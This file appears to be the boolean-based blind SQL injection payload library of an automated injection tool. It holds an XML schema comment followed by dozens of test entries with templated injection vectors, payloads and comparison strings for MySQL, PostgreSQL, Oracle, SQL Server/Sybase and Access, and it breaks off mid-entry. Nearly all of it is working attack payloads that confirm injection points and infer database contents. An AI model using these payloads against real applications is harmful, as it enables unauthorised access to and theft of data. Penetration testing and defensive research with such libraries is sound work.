    "content": "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n\n<!--\nTag: <test>\n    SQL injection test definition.\n\n    Sub-tag: <title>\n        Title of the test.\n\n    Sub-tag: <stype>\n        SQL injection family type.\n\n        Valid values:\n            1: Boolean-based blind SQL injection\n            2: Error-based queries SQL injection\n            3: Inline queries SQL injection\n            4: Stacked queries SQL injection\n            5: Time-based blind SQL injection\n            6: UNION query SQL injection\n\n    Sub-tag: <level>\n        From which level check for this test.\n\n        Valid values:\n            1: Always (<100 requests)\n            2: Try a bit harder (100-200 requests)\n            3: Good number of requests (200-500 requests)\n            4: Extensive test (500-1000 requests)\n            5: You have plenty of time (>1000 requests)\n\n    Sub-tag: <risk>\n        Likelihood of a payload to damage the data integrity.\n\n        Valid values:\n            1: Low risk\n            2: Medium risk\n            3: High risk\n\n    Sub-tag: <clause>\n        In which clause the payload can work.\n\n        NOTE: for instance, there are some payload that do not have to be\n        tested as soon as it has been identified whether or not the\n        injection is within a WHERE clause condition.\n\n        Valid values:\n            0: Always\n            1: WHERE / HAVING\n            2: GROUP BY\n            3: ORDER BY\n            4: LIMIT\n            5: OFFSET\n            6: TOP\n            7: Table name\n            8: Column name\n            9: Pre-WHERE (non-query)\n\n        A comma separated list of these values is also possible.\n\n    Sub-tag: <where>\n        Where to add our '<prefix> <payload><comment> <suffix>' string.\n\n        Valid values:\n            1: Append the string to the parameter original value\n            2: Replace the parameter original value with a negative random\n               integer value and append our string\n            3: Replace the parameter original value with our string\n\n    Sub-tag: <vector>\n        The payload that will be used to exploit the injection point.\n\n    Sub-tag: <request>\n        What to inject for this test.\n\n        Sub-tag: <payload>\n            The payload to test for.\n\n        Sub-tag: <comment>\n            Comment to append to the payload, before the suffix.\n\n        Sub-tag: <char>\n            Character to use to bruteforce number of columns in UNION\n            query SQL injection tests.\n\n        Sub-tag: <columns>\n            Range of columns to test for in UNION query SQL injection\n            tests.\n\n    Sub-tag: <response>\n        How to identify if the injected payload succeeded.\n\n        Sub-tag: <comparison>\n            Perform a request with this string as the payload and compare\n            the response with the <payload> response. Apply the comparison\n            algorithm.\n\n            NOTE: useful to test for boolean-based blind SQL injections.\n\n        Sub-tag: <grep>\n            Regular expression to grep for in the response body.\n\n            NOTE: useful to test for error-based SQL injection.\n\n        Sub-tag: <time>\n            Time in seconds to wait before the response is returned.\n\n            NOTE: useful to test for time-based blind and stacked queries\n            SQL injections.\n\n        Sub-tag: <union>\n            Calls unionTest() function.\n\n            NOTE: useful to test for UNION query (inband) SQL injection.\n\n    Sub-tag: <details>\n        Which details can be infered if the payload succeed.\n\n        Sub-tags: <dbms>\n            What is the database management system (e.g. MySQL).\n\n        Sub-tags: <dbms_version>\n            What is the database management system version (e.g. 5.0.51).\n\n        Sub-tags: <os>\n            What is the database management system underlying operating\n            system.\n\n    <test>\n        <title></title>\n        <stype></stype>\n        <level></level>\n        <risk></risk>\n        <clause></clause>\n        <where></where>\n        <vector></vector>\n        <request>\n            <payload></payload>\n            <comment></comment>\n            <char></char>\n            <columns></columns>\n        </request>\n        <response>\n            <comparison></comparison>\n            <grep></grep>\n            <time></time>\n            <union></union>\n        </response>\n        <details>\n            <dbms></dbms>\n            <dbms_version></dbms_version>\n            <os></os>\n        </details>\n    </test>\n-->\n\n<root>\n    <!-- Boolean-based blind tests - WHERE/HAVING clause -->\n    <test>\n        <title>AND boolean-based blind - WHERE or HAVING clause</title>\n        <stype>1</stype>\n        <level>1</level>\n        <risk>1</risk>\n        <clause>1,8,9</clause>\n        <where>1</where>\n        <vector>AND [INFERENCE]</vector>\n        <request>\n            <payload>AND [RANDNUM]=[RANDNUM]</payload>\n        </request>\n        <response>\n            <comparison>AND [RANDNUM]=[RANDNUM1]</comparison>\n        </response>\n    </test>\n\n    <test>\n        <title>OR boolean-based blind - WHERE or HAVING clause</title>\n        <stype>1</stype>\n        <level>1</level>\n        <risk>3</risk>\n        <clause>1,9</clause>\n        <where>2</where>\n        <vector>OR [INFERENCE]</vector>\n        <request>\n            <payload>OR [RANDNUM]=[RANDNUM]</payload>\n        </request>\n        <response>\n            <comparison>OR [RANDNUM]=[RANDNUM1]</comparison>\n        </response>\n    </test>\n\n    <test>\n        <title>OR boolean-based blind - WHERE or HAVING clause (NOT)</title>\n        <stype>1</stype>\n        <level>3</level>\n        <risk>3</risk>\n        <clause>1,9</clause>\n        <where>1</where>\n        <vector>OR NOT [INFERENCE]</vector>\n        <request>\n            <payload>OR NOT [RANDNUM]=[RANDNUM]</payload>\n        </request>\n        <response>\n            <comparison>OR NOT [RANDNUM]=[RANDNUM1]</comparison>\n        </response>\n    </test>\n\n    <test>\n        <title>AND boolean-based blind - WHERE or HAVING clause (subquery - comment)</title>\n        <stype>1</stype>\n        <level>2</level>\n        <risk>1</risk>\n        <clause>1,8,9</clause>\n        <where>1</where>\n        <vector>AND [RANDNUM]=(SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END))</vector>\n        <request>\n            <payload>AND [RANDNUM]=(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END))</payload>\n            <comment>[GENERIC_SQL_COMMENT]</comment>\n        </request>\n        <response>\n            <comparison>AND [RANDNUM]=(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END))</comparison>\n        </response>\n    </test>\n\n    <test>\n        <title>OR boolean-based blind - WHERE or HAVING clause (subquery - comment)</title>\n        <stype>1</stype>\n        <level>2</level>\n        <risk>3</risk>\n        <clause>1,9</clause>\n        <where>2</where>\n        <vector>OR [RANDNUM]=(SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END))</vector>\n        <request>\n            <payload>OR [RANDNUM]=(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END))</payload>\n            <comment>[GENERIC_SQL_COMMENT]</comment>\n        </request>\n        <response>\n            <comparison>OR [RANDNUM]=(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END))</comparison>\n        </response>\n    </test>\n\n    <test>\n        <title>AND boolean-based blind - WHERE or HAVING clause (comment)</title>\n        <stype>1</stype>\n        <level>2</level>\n        <risk>1</risk>\n        <clause>1</clause>\n        <where>1</where>\n        <vector>AND [INFERENCE]</vector>\n        <request>\n            <payload>AND [RANDNUM]=[RANDNUM]</payload>\n            <comment>[GENERIC_SQL_COMMENT]</comment>\n        </request>\n        <response>\n            <comparison>AND [RANDNUM]=[RANDNUM1]</comparison>\n        </response>\n    </test>\n\n    <test>\n        <title>OR boolean-based blind - WHERE or HAVING clause (comment)</title>\n        <stype>1</stype>\n        <level>2</level>\n        <risk>3</risk>\n        <clause>1</clause>\n        <where>2</where>\n        <vector>OR [INFERENCE]</vector>\n        <request>\n            <payload>OR [RANDNUM]=[RANDNUM]</payload>\n            <comment>[GENERIC_SQL_COMMENT]</comment>\n        </request>\n        <response>\n            <comparison>OR [RANDNUM]=[RANDNUM1]</comparison>\n        </response>\n    </test>\n\n    <test>\n        <title>OR boolean-based blind - WHERE or HAVING clause (NOT - comment)</title>\n        <stype>1</stype>\n        <level>4</level>\n        <risk>3</risk>\n        <clause>1</clause>\n        <where>1</where>\n        <vector>OR NOT [INFERENCE]</vector>\n        <request>\n            <payload>OR NOT [RANDNUM]=[RANDNUM]</payload>\n            <comment>[GENERIC_SQL_COMMENT]</comment>\n        </request>\n        <response>\n            <comparison>OR NOT [RANDNUM]=[RANDNUM1]</comparison>\n        </response>\n    </test>\n\n    <test>\n        <title>AND boolean-based blind - WHERE or HAVING clause (MySQL comment)</title>\n        <stype>1</stype>\n        <level>3</level>\n        <risk>1</risk>\n        <clause>1</clause>\n        <where>1</where>\n        <vector>AND [INFERENCE]</vector>\n        <request>\n            <payload>AND [RANDNUM]=[RANDNUM]</payload>\n            <comment>#</comment>\n        </request>\n        <response>\n            <comparison>AND [RANDNUM]=[RANDNUM1]</comparison>\n        </response>\n        <details>\n            <dbms>MySQL</dbms>\n        </details>\n    </test>\n\n    <test>\n        <title>OR boolean-based blind - WHERE or HAVING clause (MySQL comment)</title>\n        <stype>1</stype>\n        <level>3</level>\n        <risk>3</risk>\n        <clause>1</clause>\n        <where>2</where>\n        <vector>OR [INFERENCE]</vector>\n        <request>\n            <payload>OR [RANDNUM]=[RANDNUM]</payload>\n            <comment>#</comment>\n        </request>\n        <response>\n            <comparison>OR [RANDNUM]=[RANDNUM1]</comparison>\n        </response>\n        <details>\n            <dbms>MySQL</dbms>\n        </details>\n    </test>\n\n    <test>\n        <title>OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)</title>\n        <stype>1</stype>\n        <level>3</level>\n        <risk>3</risk>\n        <clause>1</clause>\n        <where>1</where>\n        <vector>OR NOT [INFERENCE]</vector>\n        <request>\n            <payload>OR NOT [RANDNUM]=[RANDNUM]</payload>\n            <comment>#</comment>\n        </request>\n        <response>\n            <comparison>OR NOT [RANDNUM]=[RANDNUM1]</comparison>\n        </response>\n        <details>\n            <dbms>MySQL</dbms>\n        </details>\n    </test>\n\n    <test>\n        <title>AND boolean-based blind - WHERE or HAVING clause (Microsoft Access comment)</title>\n        <stype>1</stype>\n        <level>3</level>\n        <risk>1</risk>\n        <clause>1</clause>\n        <where>1</where>\n        <vector>AND [INFERENCE]</vector>\n        <request>\n            <payload>AND [RANDNUM]=[RANDNUM]</payload>\n            <comment>%16</comment>\n        </request>\n        <response>\n            <comparison>AND [RANDNUM]=[RANDNUM1]</comparison>\n        </response>\n        <details>\n            <dbms>Microsoft Access</dbms>\n        </details>\n    </test>\n\n    <test>\n        <title>OR boolean-based blind - WHERE or HAVING clause (Microsoft Access comment)</title>\n        <stype>1</stype>\n        <level>3</level>\n        <risk>3</risk>\n        <clause>1</clause>\n        <where>2</where>\n        <vector>OR [INFERENCE]</vector>\n        <request>\n            <payload>OR [RANDNUM]=[RANDNUM]</payload>\n            <comment>%16</comment>\n        </request>\n        <response>\n            <comparison>OR [RANDNUM]=[RANDNUM1]</comparison>\n        </response>\n        <details>\n            <dbms>Microsoft Access</dbms>\n        </details>\n    </test>\n\n    <test>\n        <title>MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause</title>\n        <stype>1</stype>\n        <level>2</level>\n        <risk>1</risk>\n        <clause>1,2,3</clause>\n        <where>1</where>\n        <vector>RLIKE (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 0x28 END))</vector>\n        <request>\n            <payload>RLIKE (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 0x28 END))</payload>\n        </request>\n        <response>\n            <comparison>RLIKE (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE 0x28 END))</comparison>\n        </response>\n        <details>\n            <dbms>MySQL</dbms>\n        </details>\n    </test>\n\n    <test>\n        <title>MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)</title>\n        <stype>1</stype>\n        <level>3</level>\n        <risk>1</risk>\n        <clause>1,2,3,8</clause>\n        <where>1</where>\n        <vector>AND MAKE_SET([INFERENCE],[RANDNUM])</vector>\n        <request>\n            <payload>AND MAKE_SET([RANDNUM]=[RANDNUM],[RANDNUM1])</payload>\n        </request>\n        <response>\n            <comparison>AND MAKE_SET([RANDNUM]=[RANDNUM1],[RANDNUM1])</comparison>\n        </response>\n        <details>\n            <dbms>MySQL</dbms>\n        </details>\n    </test>\n\n    <test>\n        <title>MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)</title>\n        <stype>1</stype>\n        <level>3</level>\n        <risk>3</risk>\n        <clause>1,2,3</clause>\n        <where>2</where>\n        <vector>OR MAKE_SET([INFERENCE],[RANDNUM])</vector>\n        <request>\n            <payload>OR MAKE_SET([RANDNUM]=[RANDNUM],[RANDNUM1])</payload>\n        </request>\n        <response>\n            <comparison>OR MAKE_SET([RANDNUM]=[RANDNUM1],[RANDNUM1])</comparison>\n        </response>\n        <details>\n            <dbms>MySQL</dbms>\n        </details>\n    </test>\n\n    <test>\n        <title>MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)</title>\n        <stype>1</stype>\n        <level>4</level>\n        <risk>1</risk>\n        <clause>1,2,3,8</clause>\n        <where>1</where>\n        <vector>AND ELT([INFERENCE],[RANDNUM])</vector>\n        <request>\n            <payload>AND ELT([RANDNUM]=[RANDNUM],[RANDNUM1])</payload>\n        </request>\n        <response>\n            <comparison>AND ELT([RANDNUM]=[RANDNUM1],[RANDNUM1])</comparison>\n        </response>\n        <details>\n            <dbms>MySQL</dbms>\n        </details>\n    </test>\n\n    <test>\n        <title>MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)</title>\n        <stype>1</stype>\n        <level>4</level>\n        <risk>3</risk>\n        <clause>1,2,3</clause>\n        <where>2</where>\n        <vector>OR ELT([INFERENCE],[RANDNUM])</vector>\n        <request>\n            <payload>OR ELT([RANDNUM]=[RANDNUM],[RANDNUM1])</payload>\n        </request>\n        <response>\n            <comparison>OR ELT([RANDNUM]=[RANDNUM1],[RANDNUM1])</comparison>\n        </response>\n        <details>\n            <dbms>MySQL</dbms>\n        </details>\n    </test>\n\n    <test>\n        <title>MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (bool*int)</title>\n        <stype>1</stype>\n        <level>5</level>\n        <risk>1</risk>\n        <clause>1,2,3,8</clause>\n        <where>1</where>\n        <vector>AND ([INFERENCE])*[RANDNUM]</vector>\n        <request>\n            <payload>AND ([RANDNUM]=[RANDNUM])*[RANDNUM1]</payload>\n        </request>\n        <response>\n            <comparison>AND ([RANDNUM]=[RANDNUM1])*[RANDNUM1]</comparison>\n        </response>\n        <details>\n            <dbms>MySQL</dbms>\n        </details>\n    </test>\n\n    <test>\n        <title>MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (bool*int)</title>\n        <stype>1</stype>\n        <level>5</level>\n        <risk>3</risk>\n        <clause>1,2,3</clause>\n        <where>2</where>\n        <vector>OR ([INFERENCE])*[RANDNUM]</vector>\n        <request>\n            <payload>OR ([RANDNUM]=[RANDNUM])*[RANDNUM1]</payload>\n        </request>\n        <response>\n            <comparison>OR ([RANDNUM]=[RANDNUM1])*[RANDNUM1]</comparison>\n        </response>\n        <details>\n            <dbms>MySQL</dbms>\n        </details>\n    </test>\n\n    <test>\n        <title>PostgreSQL AND boolean-based blind - WHERE or HAVING clause (CAST)</title>\n        <stype>1</stype>\n        <level>2</level>\n        <risk>1</risk>\n        <clause>1,8</clause>\n        <where>1</where>\n        <vector>AND (SELECT (CASE WHEN ([INFERENCE]) THEN NULL ELSE CAST('[RANDSTR]' AS NUMERIC) END)) IS NULL</vector>\n        <request>\n            <payload>AND (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN NULL ELSE CAST('[RANDSTR]' AS NUMERIC) END)) IS NULL</payload>\n        </request>\n        <response>\n            <comparison>AND (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN NULL ELSE CAST('[RANDSTR]' AS NUMERIC) END)) IS NULL</comparison>\n        </response>\n        <details>\n            <dbms>PostgreSQL</dbms>\n        </details>\n    </test>\n\n    <test>\n        <title>PostgreSQL OR boolean-based blind - WHERE or HAVING clause (CAST)</title>\n        <stype>1</stype>\n        <level>3</level>\n        <risk>3</risk>\n        <clause>1</clause>\n        <where>2</where>\n        <vector>OR (SELECT (CASE WHEN ([INFERENCE]) THEN NULL ELSE CAST('[RANDSTR]' AS NUMERIC) END)) IS NULL</vector>\n        <request>\n            <payload>OR (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN NULL ELSE CAST('[RANDSTR]' AS NUMERIC) END)) IS NULL</payload>\n        </request>\n        <response>\n            <comparison>OR (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN NULL ELSE CAST('[RANDSTR]' AS NUMERIC) END)) IS NULL</comparison>\n        </response>\n        <details>\n            <dbms>PostgreSQL</dbms>\n        </details>\n    </test>\n\n    <test>\n        <title>Oracle AND boolean-based blind - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)</title>\n        <stype>1</stype>\n        <level>2</level>\n        <risk>1</risk>\n        <clause>1</clause>\n        <where>1</where>\n        <vector>AND (SELECT (CASE WHEN ([INFERENCE]) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,[RANDNUM]) END) FROM DUAL) IS NULL</vector>\n        <request>\n            <payload>AND (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,[RANDNUM]) END) FROM DUAL) IS NULL</payload>\n        </request>\n        <response>\n            <comparison>AND (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,[RANDNUM]) END) FROM DUAL) IS NULL</comparison>\n        </response>\n        <details>\n            <dbms>Oracle</dbms>\n        </details>\n    </test>\n\n    <test>\n        <title>Oracle OR boolean-based blind - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)</title>\n        <stype>1</stype>\n        <level>3</level>\n        <risk>3</risk>\n        <clause>1</clause>\n        <where>2</where>\n        <vector>OR (SELECT (CASE WHEN ([INFERENCE]) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,[RANDNUM]) END) FROM DUAL) IS NULL</vector>\n        <request>\n            <payload>OR (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,[RANDNUM]) END) FROM DUAL) IS NULL</payload>\n        </request>\n        <response>\n            <comparison>OR (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,[RANDNUM]) END) FROM DUAL) IS NULL</comparison>\n        </response>\n        <details>\n            <dbms>Oracle</dbms>\n        </details>\n    </test>\n    <!-- End of boolean-based blind tests - WHERE or HAVING clause -->\n\n    <!-- Boolean-based blind tests - Parameter replace -->\n    <test>\n        <title>Boolean-based blind - Parameter replace (original value)</title>\n        <stype>1</stype>\n        <level>1</level>\n        <risk>1</risk>\n        <clause>1,2,3</clause>\n        <where>3</where>\n        <vector>(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END))</vector>\n        <request>\n            <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END))</payload>\n        </request>\n        <response>\n            <comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END))</comparison>\n        </response>\n    </test>\n\n    <test>\n        <title>MySQL boolean-based blind - Parameter replace (MAKE_SET)</title>\n        <stype>1</stype>\n        <level>4</level>\n        <risk>1</risk>\n        <clause>1,2,3</clause>\n        <where>3</where>\n        <vector>MAKE_SET([INFERENCE],[RANDNUM])</vector>\n        <request>\n            <payload>MAKE_SET([RANDNUM]=[RANDNUM],[RANDNUM1])</payload>\n        </request>\n        <response>\n            <comparison>MAKE_SET([RANDNUM]=[RANDNUM1],[RANDNUM1])</comparison>\n        </response>\n        <details>\n            <dbms>MySQL</dbms>\n        </details>\n    </test>\n\n    <test>\n        <title>MySQL boolean-based blind - Parameter replace (MAKE_SET - original value)</title>\n        <stype>1</stype>\n        <level>5</level>\n        <risk>1</risk>\n        <clause>1,2,3</clause>\n        <where>3</where>\n        <vector>MAKE_SET([INFERENCE],[ORIGVALUE])</vector>\n        <request>\n            <payload>MAKE_SET([RANDNUM]=[RANDNUM],[ORIGVALUE])</payload>\n        </request>\n        <response>\n            <comparison>MAKE_SET([RANDNUM]=[RANDNUM1],[ORIGVALUE])</comparison>\n        </response>\n        <details>\n            <dbms>MySQL</dbms>\n        </details>\n    </test>\n\n    <test>\n        <title>MySQL boolean-based blind - Parameter replace (ELT)</title>\n        <stype>1</stype>\n        <level>4</level>\n        <risk>1</risk>\n        <clause>1,2,3</clause>\n        <where>3</where>\n        <vector>ELT([INFERENCE],[RANDNUM])</vector>\n        <request>\n            <payload>ELT([RANDNUM]=[RANDNUM],[RANDNUM1])</payload>\n        </request>\n        <response>\n            <comparison>ELT([RANDNUM]=[RANDNUM1],[RANDNUM1])</comparison>\n        </response>\n        <details>\n            <dbms>MySQL</dbms>\n        </details>\n    </test>\n\n    <test>\n        <title>MySQL boolean-based blind - Parameter replace (ELT - original value)</title>\n        <stype>1</stype>\n        <level>5</level>\n        <risk>1</risk>\n        <clause>1,2,3</clause>\n        <where>3</where>\n        <vector>ELT([INFERENCE],[ORIGVALUE])</vector>\n        <request>\n            <payload>ELT([RANDNUM]=[RANDNUM],[ORIGVALUE])</payload>\n        </request>\n        <response>\n            <comparison>ELT([RANDNUM]=[RANDNUM1],[ORIGVALUE])</comparison>\n        </response>\n        <details>\n            <dbms>MySQL</dbms>\n        </details>\n    </test>\n\n    <test>\n        <title>MySQL boolean-based blind - Parameter replace (bool*int)</title>\n        <stype>1</stype>\n        <level>4</level>\n        <risk>1</risk>\n        <clause>1,2,3</clause>\n        <where>3</where>\n        <vector>([INFERENCE])*[RANDNUM]</vector>\n        <request>\n            <payload>([RANDNUM]=[RANDNUM])*[RANDNUM1]</payload>\n        </request>\n        <response>\n            <comparison>([RANDNUM]=[RANDNUM1])*[RANDNUM1]</comparison>\n        </response>\n        <details>\n            <dbms>MySQL</dbms>\n        </details>\n    </test>\n\n    <test>\n        <title>MySQL boolean-based blind - Parameter replace (bool*int - original value)</title>\n        <stype>1</stype>\n        <level>5</level>\n        <risk>1</risk>\n        <clause>1,2,3</clause>\n        <where>3</where>\n        <vector>([INFERENCE])*[ORIGVALUE]</vector>\n        <request>\n            <payload>([RANDNUM]=[RANDNUM])*[ORIGVALUE]</payload>\n        </request>\n        <response>\n            <comparison>([RANDNUM]=[RANDNUM1])*[ORIGVALUE]</comparison>\n        </response>\n        <details>\n            <dbms>MySQL</dbms>\n        </details>\n    </test>\n\n    <test>\n        <title>PostgreSQL boolean-based blind - Parameter replace</title>\n        <stype>1</stype>\n        <level>3</level>\n        <risk>1</risk>\n        <clause>1,2,3</clause>\n        <where>3</where>\n        <vector>(SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE 1/(SELECT 0) END))</vector>\n        <request>\n            <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE 1/(SELECT 0) END))</payload>\n        </request>\n        <response>\n            <comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE 1/(SELECT 0) END))</comparison>\n        </response>\n        <details>\n            <dbms>PostgreSQL</dbms>\n        </details>\n    </test>\n\n    <test>\n        <title>PostgreSQL boolean-based blind - Parameter replace (original value)</title>\n        <stype>1</stype>\n        <level>4</level>\n        <risk>1</risk>\n        <clause>1,2,3</clause>\n        <where>3</where>\n        <vector>(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END))</vector>\n        <request>\n            <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END))</payload>\n        </request>\n        <response>\n            <comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END))</comparison>\n        </response>\n        <details>\n            <dbms>PostgreSQL</dbms>\n        </details>\n    </test>\n\n    <!-- Because of the syntax of GENERATE_SERIES() function, the 'then' condition must be 1, do not change it -->\n    <test>\n        <title>PostgreSQL boolean-based blind - Parameter replace (GENERATE_SERIES)</title>\n        <stype>1</stype>\n        <level>5</level>\n        <risk>1</risk>\n        <clause>1,2,3</clause>\n        <where>3</where>\n        <vector>(SELECT * FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([INFERENCE]) THEN 1 ELSE 0 END) LIMIT 1)</vector>\n        <request>\n            <payload>(SELECT * FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) LIMIT 1)</payload>\n        </request>\n        <response>\n            <comparison>(SELECT * FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE 0 END) LIMIT 1)</comparison>\n        </response>\n        <details>\n            <dbms>PostgreSQL</dbms>\n        </details>\n    </test>\n\n    <!-- Because of the syntax of GENERATE_SERIES() function, the 'then' condition must be 1, do not change it -->\n    <test>\n        <title>PostgreSQL boolean-based blind - Parameter replace (GENERATE_SERIES - original value)</title>\n        <stype>1</stype>\n        <level>5</level>\n        <risk>1</risk>\n        <clause>1,2,3</clause>\n        <where>3</where>\n        <vector>(SELECT [ORIGVALUE] FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([INFERENCE]) THEN 1 ELSE 0 END) LIMIT 1)</vector>\n        <request>\n            <payload>(SELECT [ORIGVALUE] FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) LIMIT 1)</payload>\n        </request>\n        <response>\n            <comparison>(SELECT [ORIGVALUE] FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE 0 END) LIMIT 1)</comparison>\n        </response>\n        <details>\n            <dbms>PostgreSQL</dbms>\n        </details>\n    </test>\n\n    <test>\n        <title>Microsoft SQL Server/Sybase boolean-based blind - Parameter replace</title>\n        <stype>1</stype>\n        <level>3</level>\n        <risk>1</risk>\n        <clause>1,3</clause>\n        <where>3</where>\n        <vector>(SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END))</vector>\n        <request>\n            <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END))</payload>\n        </request>\n        <response>\n            <comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END))</comparison>\n        </response>\n        <details>\n            <dbms>Microsoft SQL Server</dbms>\n            <dbms>Sybase</dbms>\n        </details>\n    </test>\n\n    <test>\n        <title>Microsoft SQL Server/Sybase boolean-based blind - Parameter replace (original value)</title>\n        <stype>1</stype>\n        <level>4</level>\n        <risk>1</risk>\n        <clause>1,3</clause>\n        <where>3</where>\n        <vector>(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END))</vector>\n        <request>\n            <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END))</payload>\n        </request>\n        <response>\n            <comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END))</comparison>\n        </response>\n        <details>\n            <dbms>Microsoft SQL Server</dbms>\n            <dbms>Sybase</dbms>\n        </details>\n    </test>\n\n    <test>\n        <title>Oracle boolean-based blind - Parameter replace</title>\n        <stype>1</stype>\n        <level>3</level>\n        <risk>1</risk>\n        <clause>1,3</clause>\n        <where>3</where>\n        <vector>(SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)</vector>\n        <request>\n            <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)</payload>\n        </request>\n        <response>\n            <comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)</comparison>\n        </response>\n        <details>\n            <dbms>Oracle</dbms>\n        </details>\n    </test>\n\n    <test>\n        <title>Oracle boolean-based blind - Parameter replace (original value)</title>\n        <stype>1</stype>\n        <level>4</level>\n        <risk>1</risk>\n        <clause>1,3</clause>\n        <where>3</where>\n        <vector>(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)</vector>\n        <request>\n            <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)</payload>\n        </request>\n        <response>\n            <comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM 